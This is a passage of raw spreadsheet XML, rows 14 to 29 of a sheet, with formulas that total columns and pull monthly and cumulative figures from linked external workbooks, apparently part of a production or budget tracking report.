      </c>
      <c r="Y14" s="210" t="str">
        <f>'[11]16'!$R$71</f>
        <v>202.50</v>
      </c>
      <c r="Z14" s="210" t="str">
        <f>'[11]16'!$S$71</f>
        <v>4229.00</v>
      </c>
    </row>
    <row r="15" ht="15.75" customHeight="1" spans="1:26">
      <c r="A15" s="191"/>
      <c r="B15" s="193"/>
      <c r="C15" s="193"/>
      <c r="D15" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E15" s="194">
        <f>E25+E35+E45+E55</f>
        <v>0</v>
      </c>
      <c r="F15" s="194">
        <f>F25+F35+F45+F55</f>
        <v>0</v>
      </c>
      <c r="G15" s="194">
        <f>G25+G35+G45+G55</f>
        <v>0</v>
      </c>
      <c r="H15" s="194">
        <f>G15+'15'!H15</f>
        <v>0</v>
      </c>
      <c r="I15" s="194">
        <f>H15+yc!I15</f>
        <v>0</v>
      </c>
      <c r="J15" s="194">
        <f>J25+J35+J45+J55</f>
        <v>247.38</v>
      </c>
      <c r="K15" s="194">
        <f>J15+'15'!K15</f>
        <v>4995.158</v>
      </c>
      <c r="L15" s="194">
        <f>K15+yc!L15</f>
        <v>119751.658</v>
      </c>
      <c r="M15" s="194"/>
      <c r="N15" s="212"/>
      <c r="O15" s="199"/>
      <c r="P15" s="208"/>
      <c r="Q15" s="193" t="s">
        <v>241</v>
      </c>
      <c r="R15" s="209">
        <f>'[11]16'!$W$72</f>
        <v>69.4847020933977</v>
      </c>
      <c r="S15" s="209">
        <f>'[11]16'!$X$72</f>
        <v>63.1336586901763</v>
      </c>
      <c r="T15" s="209">
        <f>'[11]16'!$Y$72</f>
        <v>61.3929643870096</v>
      </c>
      <c r="U15" s="209">
        <f>'[11]16'!$T$72</f>
        <v>51.75</v>
      </c>
      <c r="V15" s="209">
        <f>'[11]16'!$U$72</f>
        <v>66.1666666666667</v>
      </c>
      <c r="W15" s="209">
        <f>'[11]16'!$V$72</f>
        <v>51.4592857142857</v>
      </c>
      <c r="X15" s="210" t="str">
        <f>'[11]16'!$Q$72</f>
        <v>12.42</v>
      </c>
      <c r="Y15" s="210" t="str">
        <f>'[11]16'!$R$72</f>
        <v>254.08</v>
      </c>
      <c r="Z15" s="210" t="str">
        <f>'[11]16'!$S$72</f>
        <v>4322.58</v>
      </c>
    </row>
    <row r="16" ht="15.75" customHeight="1" spans="1:26">
      <c r="A16" s="191"/>
      <c r="B16" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C16" s="193"/>
      <c r="D16" s="193"/>
      <c r="E16" s="194">
        <f>E26+E36+E46+E56+E64+E71</f>
        <v>0</v>
      </c>
      <c r="F16" s="194"/>
      <c r="G16" s="194">
        <f>G26+G36+G46+G56+G64+G71</f>
        <v>0</v>
      </c>
      <c r="H16" s="194">
        <f>G16+'15'!H16</f>
        <v>0</v>
      </c>
      <c r="I16" s="194">
        <f>H16+yc!I16</f>
        <v>0</v>
      </c>
      <c r="J16" s="194">
        <f>J26+J36+J46+J56+J64+J71+J75</f>
        <v>0</v>
      </c>
      <c r="K16" s="194">
        <f>J16+'15'!K16</f>
        <v>0</v>
      </c>
      <c r="L16" s="194">
        <f>K16+yc!L16</f>
        <v>0</v>
      </c>
      <c r="M16" s="194"/>
      <c r="N16" s="195"/>
      <c r="O16" s="199"/>
      <c r="P16" s="208"/>
      <c r="Q16" s="193" t="s">
        <v>243</v>
      </c>
      <c r="R16" s="209">
        <f>'[11]16'!$W$73</f>
        <v>64.3317230273752</v>
      </c>
      <c r="S16" s="209">
        <f>'[11]16'!$X$73</f>
        <v>60.3589420654912</v>
      </c>
      <c r="T16" s="209">
        <f>'[11]16'!$Y$73</f>
        <v>62.7706559108375</v>
      </c>
      <c r="U16" s="209">
        <f>'[11]16'!$T$73</f>
        <v>51.75</v>
      </c>
      <c r="V16" s="209">
        <f>'[11]16'!$U$73</f>
        <v>66.1666666666667</v>
      </c>
      <c r="W16" s="209">
        <f>'[11]16'!$V$73</f>
        <v>52.9797619047619</v>
      </c>
      <c r="X16" s="210" t="str">
        <f>'[11]16'!$Q$73</f>
        <v>12.42</v>
      </c>
      <c r="Y16" s="210" t="str">
        <f>'[11]16'!$R$73</f>
        <v>254.08</v>
      </c>
      <c r="Z16" s="210" t="str">
        <f>'[11]16'!$S$73</f>
        <v>4450.30</v>
      </c>
    </row>
    <row r="17" ht="15.75" customHeight="1" spans="1:26">
      <c r="A17" s="191"/>
      <c r="B17" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C17" s="193"/>
      <c r="D17" s="193"/>
      <c r="E17" s="194">
        <f>E27+E37+E47+E57+E65+E72+E83</f>
        <v>650000</v>
      </c>
      <c r="F17" s="194"/>
      <c r="G17" s="194">
        <f>G27+G37+G47+G57+G65+G72</f>
        <v>0</v>
      </c>
      <c r="H17" s="194">
        <f>G17+'15'!H17</f>
        <v>0</v>
      </c>
      <c r="I17" s="194">
        <f>H17+yc!I17</f>
        <v>0</v>
      </c>
      <c r="J17" s="194">
        <f>J27+J37+J47+J57+J65+J72+J76</f>
        <v>0</v>
      </c>
      <c r="K17" s="194">
        <f>J17+'15'!K17</f>
        <v>0</v>
      </c>
      <c r="L17" s="194">
        <f>K17+yc!L17</f>
        <v>0</v>
      </c>
      <c r="M17" s="194"/>
      <c r="N17" s="195"/>
      <c r="O17" s="199"/>
      <c r="P17" s="213" t="s">
        <v>252</v>
      </c>
      <c r="Q17" s="193" t="s">
        <v>230</v>
      </c>
      <c r="R17" s="209">
        <f>'[12]16'!$W$71</f>
        <v>0</v>
      </c>
      <c r="S17" s="209">
        <f>'[12]16'!$X$71</f>
        <v>0</v>
      </c>
      <c r="T17" s="209">
        <f>'[12]16'!$Y$71</f>
        <v>0</v>
      </c>
      <c r="U17" s="209">
        <f>'[12]16'!$T$71</f>
        <v>0</v>
      </c>
      <c r="V17" s="209">
        <f>'[12]16'!$U$71</f>
        <v>0</v>
      </c>
      <c r="W17" s="209">
        <f>'[12]16'!$V$71</f>
        <v>0</v>
      </c>
      <c r="X17" s="209">
        <f>'[12]16'!$Q$71</f>
        <v>0</v>
      </c>
      <c r="Y17" s="209">
        <f>'[12]16'!$R$71</f>
        <v>0</v>
      </c>
      <c r="Z17" s="209">
        <f>'[12]16'!$S$71</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="15.75" customHeight="1" spans="1:26">
      <c r="A18" s="191"/>
      <c r="B18" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C18" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D18" s="193"/>
      <c r="E18" s="194">
        <f>E28+E38+E48+E58+E66+E73</f>
        <v>0</v>
      </c>
      <c r="F18" s="194"/>
      <c r="G18" s="194">
        <f>G28+G38+G48+G58+G66+G73</f>
        <v>0</v>
      </c>
      <c r="H18" s="194">
        <f>G18+'15'!H18</f>
        <v>0</v>
      </c>
      <c r="I18" s="194">
        <f>H18+yc!I18</f>
        <v>0</v>
      </c>
      <c r="J18" s="194">
        <f>J28+J38+J48+J58+J66+J73</f>
        <v>0</v>
      </c>
      <c r="K18" s="194">
        <f>J18+'15'!K18</f>
        <v>0</v>
      </c>
      <c r="L18" s="194">
        <f>K18+yc!L18</f>
        <v>0</v>
      </c>
      <c r="M18" s="194"/>
      <c r="N18" s="195"/>
      <c r="O18" s="199"/>
      <c r="P18" s="214"/>
      <c r="Q18" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R18" s="209">
        <f>'[12]16'!$W$74</f>
        <v>0</v>
      </c>
      <c r="S18" s="209">
        <f>'[12]16'!$X$74</f>
        <v>217.2</v>
      </c>
      <c r="T18" s="209">
        <f>'[12]16'!$Y$74</f>
        <v>222.059043410363</v>
      </c>
      <c r="U18" s="209">
        <f>'[12]16'!$T$74</f>
        <v>0</v>
      </c>
      <c r="V18" s="209">
        <f>'[12]16'!$U$74</f>
        <v>10.4166666666667</v>
      </c>
      <c r="W18" s="209">
        <f>'[12]16'!$V$74</f>
        <v>7.16583333333333</v>
      </c>
      <c r="X18" s="209">
        <f>'[12]16'!$Q$74</f>
        <v>0</v>
      </c>
      <c r="Y18" s="209">
        <f>'[12]16'!$R$74</f>
        <v>40</v>
      </c>
      <c r="Z18" s="209">
        <f>'[12]16'!$S$74</f>
        <v>601.93</v>
      </c>
    </row>
    <row r="19" ht="15.75" customHeight="1" spans="1:26">
      <c r="A19" s="191"/>
      <c r="B19" s="191"/>
      <c r="C19" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D19" s="193"/>
      <c r="E19" s="194">
        <f>E29+E39+E49+E59+E67+E74</f>
        <v>0</v>
      </c>
      <c r="F19" s="194"/>
      <c r="G19" s="194">
        <f>G29+G39+G49+G59+G67+G74</f>
        <v>0</v>
      </c>
      <c r="H19" s="194">
        <f>G19+'15'!H19</f>
        <v>0</v>
      </c>
      <c r="I19" s="194">
        <f>H19+yc!I19</f>
        <v>0</v>
      </c>
      <c r="J19" s="194">
        <f>J29+J39+J49+J59+J67+J74+J78</f>
        <v>0</v>
      </c>
      <c r="K19" s="194">
        <f>J19+'15'!K19</f>
        <v>0</v>
      </c>
      <c r="L19" s="194">
        <f>K19+yc!L19</f>
        <v>0</v>
      </c>
      <c r="M19" s="194"/>
      <c r="N19" s="195"/>
      <c r="O19" s="199"/>
      <c r="P19" s="213" t="s">
        <v>304</v>
      </c>
      <c r="Q19" s="193" t="s">
        <v>291</v>
      </c>
      <c r="R19" s="209">
        <f>'[13]16'!$W$72</f>
        <v>1e-5</v>
      </c>
      <c r="S19" s="209">
        <f>'[13]16'!$X$72</f>
        <v>1e-5</v>
      </c>
      <c r="T19" s="209">
        <f>'[13]16'!$Y$72</f>
        <v>9.13165266106443e-6</v>
      </c>
      <c r="U19" s="209">
        <f>'[13]16'!$T$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V19" s="209">
        <f>'[13]16'!$U$72</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="W19" s="209">
        <f>'[13]16'!$V$72</f>
        <v>4.25e-6</v>
      </c>
      <c r="X19" s="209">
        <f>'[13]16'!$Q$72</f>
        <v>1e-6</v>
      </c>
      <c r="Y19" s="209">
        <f>'[13]16'!$R$72</f>
        <v>1.6e-5</v>
      </c>
      <c r="Z19" s="209">
        <f>'[13]16'!$S$72</f>
        <v>0.000357</v>
      </c>
    </row>
    <row r="20" ht="15.75" customHeight="1" spans="1:26">
      <c r="A20" s="191"/>
      <c r="B20" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C20" s="193"/>
      <c r="D20" s="193"/>
      <c r="E20" s="194">
        <f>E30+E40+E50+E60</f>
        <v>0</v>
      </c>
      <c r="F20" s="194"/>
      <c r="G20" s="194">
        <f>G30+G40+G50+G60</f>
        <v>0</v>
      </c>
      <c r="H20" s="194">
        <f>G20+'15'!H20</f>
        <v>0</v>
      </c>
      <c r="I20" s="194">
        <f>H20+yc!I20</f>
        <v>0</v>
      </c>
      <c r="J20" s="194">
        <f>J30+J40+J50+J60</f>
        <v>0</v>
      </c>
      <c r="K20" s="194">
        <f>J20+'15'!K20</f>
        <v>0</v>
      </c>
      <c r="L20" s="194">
        <f>K20+yc!L20</f>
        <v>0</v>
      </c>
      <c r="M20" s="194"/>
      <c r="N20" s="195"/>
      <c r="O20" s="199"/>
      <c r="P20" s="215"/>
      <c r="Q20" s="193" t="s">
        <v>292</v>
      </c>
      <c r="R20" s="209">
        <f>'[13]16'!$W$73</f>
        <v>1e-5</v>
      </c>
      <c r="S20" s="209">
        <f>'[13]16'!$X$73</f>
        <v>133.631202048933</v>
      </c>
      <c r="T20" s="209">
        <f>'[13]16'!$Y$73</f>
        <v>239.247248230863</v>
      </c>
      <c r="U20" s="209">
        <f>'[13]16'!$T$73</f>
        <v>4.16666666666667e-6</v>
      </c>
      <c r="V20" s="209">
        <f>'[13]16'!$U$73</f>
        <v>0.750004166666667</v>
      </c>
      <c r="W20" s="209">
        <f>'[13]16'!$V$73</f>
        <v>68.8644090119048</v>
      </c>
      <c r="X20" s="209">
        <f>'[13]16'!$Q$73</f>
        <v>1e-6</v>
      </c>
      <c r="Y20" s="209">
        <f>'[13]16'!$R$73</f>
        <v>2.880016</v>
      </c>
      <c r="Z20" s="209">
        <f>'[13]16'!$S$73</f>
        <v>5784.610357</v>
      </c>
    </row>
    <row r="21" ht="15.75" customHeight="1" spans="1:26">
      <c r="A21" s="191" t="s">
        <v>229</v>
      </c>
      <c r="B21" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C21" s="193"/>
      <c r="D21" s="193"/>
      <c r="E21" s="194">
        <v>190000</v>
      </c>
      <c r="F21" s="194">
        <f>'[10]16'!$D$22</f>
        <v>83053.31</v>
      </c>
      <c r="G21" s="194">
        <f>'[10]16'!$E$22</f>
        <v>8623</v>
      </c>
      <c r="H21" s="194">
        <f>G21+'15'!H21</f>
        <v>112261</v>
      </c>
      <c r="I21" s="194">
        <f>H21+yc!I21</f>
        <v>2221699</v>
      </c>
      <c r="J21" s="194">
        <f>'[10]16'!$I$22</f>
        <v>8178.16</v>
      </c>
      <c r="K21" s="194">
        <f>J21+'15'!K21</f>
        <v>127903.78</v>
      </c>
      <c r="L21" s="194">
        <f>K21+yc!L21</f>
        <v>2194357.78</v>
      </c>
      <c r="M21" s="194">
        <f>'[10]16'!$L$22</f>
        <v>67410.53</v>
      </c>
      <c r="N21" s="195">
        <f>M21/47000*100</f>
        <v>143.426659574468</v>
      </c>
      <c r="O21" s="199"/>
      <c r="P21" s="215"/>
      <c r="Q21" s="193" t="s">
        <v>294</v>
      </c>
      <c r="R21" s="209" t="e">
        <f>'[13]16'!$W$81</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S21" s="209">
        <f>'[13]16'!$X$81</f>
        <v>281.291190028063</v>
      </c>
      <c r="T21" s="209">
        <f>'[13]16'!$Y$81</f>
        <v>275.953276416928</v>
      </c>
      <c r="U21" s="209">
        <f>'[13]16'!$T$81</f>
        <v>0</v>
      </c>
      <c r="V21" s="209">
        <f>'[13]16'!$U$81</f>
        <v>38.5108506944444</v>
      </c>
      <c r="W21" s="209">
        <f>'[13]16'!$V$81</f>
        <v>36.2338690476191</v>
      </c>
      <c r="X21" s="209">
        <f>'[13]16'!$Q$81</f>
        <v>0</v>
      </c>
      <c r="Y21" s="209">
        <f>'[13]16'!$R$81</f>
        <v>147.881666666667</v>
      </c>
      <c r="Z21" s="209">
        <f>'[13]16'!$S$81</f>
        <v>3043.645</v>
      </c>
    </row>
    <row r="22" ht="15.75" customHeight="1" spans="1:26">
      <c r="A22" s="191"/>
      <c r="B22" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C22" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D22" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E22" s="194">
        <v>163000</v>
      </c>
      <c r="F22" s="194">
        <f>'[10]16'!$D$17</f>
        <v>189966.352</v>
      </c>
      <c r="G22" s="194">
        <f>'[10]16'!$E$17</f>
        <v>0</v>
      </c>
      <c r="H22" s="194">
        <f>G22+'15'!H22</f>
        <v>62660</v>
      </c>
      <c r="I22" s="194">
        <f>H22+yc!I22</f>
        <v>2093641</v>
      </c>
      <c r="J22" s="194">
        <f>'[10]16'!$I$17</f>
        <v>7580.92</v>
      </c>
      <c r="K22" s="194">
        <f>J22+'15'!K22</f>
        <v>107288.57</v>
      </c>
      <c r="L22" s="194">
        <f>K22+yc!L22</f>
        <v>1998749.95</v>
      </c>
      <c r="M22" s="194">
        <f>'[10]16'!$L$17</f>
        <v>145337.782</v>
      </c>
      <c r="N22" s="216">
        <f>(M22+M23)/(50000+150000)*100</f>
        <v>72.668891</v>
      </c>
      <c r="O22" s="199"/>
      <c r="P22" s="215"/>
      <c r="Q22" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R22" s="209">
        <f>'[13]16'!$W$79</f>
        <v>104.552719302251</v>
      </c>
      <c r="S22" s="209">
        <f>'[13]16'!$X$79</f>
        <v>100.409262673414</v>
      </c>
      <c r="T22" s="209">
        <f>'[13]16'!$Y$79</f>
        <v>102.167638854014</v>
      </c>
      <c r="U22" s="209">
        <f>'[13]16'!$T$79</f>
        <v>25.3460648148148</v>
      </c>
      <c r="V22" s="209">
        <f>'[13]16'!$U$79</f>
        <v>49.791015625</v>
      </c>
      <c r="W22" s="209">
        <f>'[13]16'!$V$79</f>
        <v>45.5804332010582</v>
      </c>
      <c r="X22" s="209">
        <f>'[13]16'!$Q$79</f>
        <v>6.08305555555556</v>
      </c>
      <c r="Y22" s="209">
        <f>'[13]16'!$R$79</f>
        <v>191.1975</v>
      </c>
      <c r="Z22" s="209">
        <f>'[13]16'!$S$79</f>
        <v>3828.75638888889</v>
      </c>
    </row>
    <row r="23" ht="15.75" customHeight="1" spans="1:26">
      <c r="A23" s="191"/>
      <c r="B23" s="193"/>
      <c r="C23" s="193"/>
      <c r="D23" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E23" s="194"/>
      <c r="F23" s="194">
        <f>'[10]16'!$D$20</f>
        <v>0</v>
      </c>
      <c r="G23" s="194">
        <f>'[10]16'!$E$20</f>
        <v>0</v>
      </c>
      <c r="H23" s="194">
        <f>G23+'15'!H23</f>
        <v>0</v>
      </c>
      <c r="I23" s="194">
        <f>H23+yc!I23</f>
        <v>0</v>
      </c>
      <c r="J23" s="194">
        <f>'[10]16'!$I$20</f>
        <v>0</v>
      </c>
      <c r="K23" s="194">
        <f>J23+'15'!K23</f>
        <v>0</v>
      </c>
      <c r="L23" s="194">
        <f>K23+yc!L23</f>
        <v>0</v>
      </c>
      <c r="M23" s="194">
        <f>'[10]16'!$L$21</f>
        <v>0</v>
      </c>
      <c r="N23" s="217"/>
      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209" t="e">
        <f>'[13]16'!$W$80</f>
        <v>#DIV/0!</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]16'!$X$80</f>
        <v>85.0235341281979</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]16'!$Y$80</f>
        <v>79.4479538834802</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]16'!$T$80</f>
        <v>0</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]16'!$U$80</f>
        <v>38.9751157407407</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]16'!$V$80</f>
        <v>32.7919080687831</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]16'!$Q$80</f>
        <v>0</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]16'!$R$80</f>
        <v>149.664444444444</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]16'!$S$80</f>
        <v>2754.52027777778</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]16'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]16'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'15'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]16'!$I$56</f>
        <v>1220.92</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'15'!K24</f>
        <v>25767.79</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>305594.32</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]16'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]16'!$R$6</f>
        <v>79.2</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]16'!$S$6</f>
        <v>83.5880398671096</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]16'!$T$6</f>
        <v>86.0294999400408</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]16'!$O$6</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]16'!$P$6</f>
        <v>58.7890625</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]16'!$Q$6</f>
        <v>52.6151190476191</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]16'!$L$6</f>
        <v>16.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]16'!$M$6</f>
        <v>225.75</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]16'!$N$6</f>
        <v>4419.67</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]16'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'15'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]16'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'15'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]16'!$R$7</f>
        <v>194.127659574468</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]16'!$S$7</f>
        <v>201.264781491003</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]16'!$T$7</f>
        <v>188.202974570082</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]16'!$O$7</f>
        <v>48.9583333333333</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]16'!$P$7</f>
        <v>50.6510416666667</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]16'!$Q$7</f>
        <v>50.2033333333333</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]16'!$L$7</f>
        <v>11.75</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]16'!$M$7</f>
        <v>194.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]16'!$N$7</f>
        <v>4217.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'15'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'15'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]16'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]16'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]16'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]16'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]16'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]16'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]16'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]16'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]16'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'15'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'15'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]16'!$W$69</f>
        <v>21.9800287585876</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]16'!$X$69</f>
        <v>22.7179622333206</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]16'!$Y$69</f>
        <v>25.2449393165991</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]16'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]16'!$U$69</f>
        <v>75.0833333333333</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]16'!$V$69</f>
        <v>68.6809523809524</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]16'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]16'!$R$69</f>
        <v>288.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]16'!$S$69</f>
        <v>5769.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'15'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'15'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]16'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]16'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]16'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]16'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]16'!$U$104</f>
        <v>60.14765625</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]16'!$V$104</f>
        <v>64.1787738095238</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]16'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]16'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]16'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'15'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'15'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]16'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]16'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]16'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]16'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]16'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]16'!$V$105</f>
        <v>33.3831190476191</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]16'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
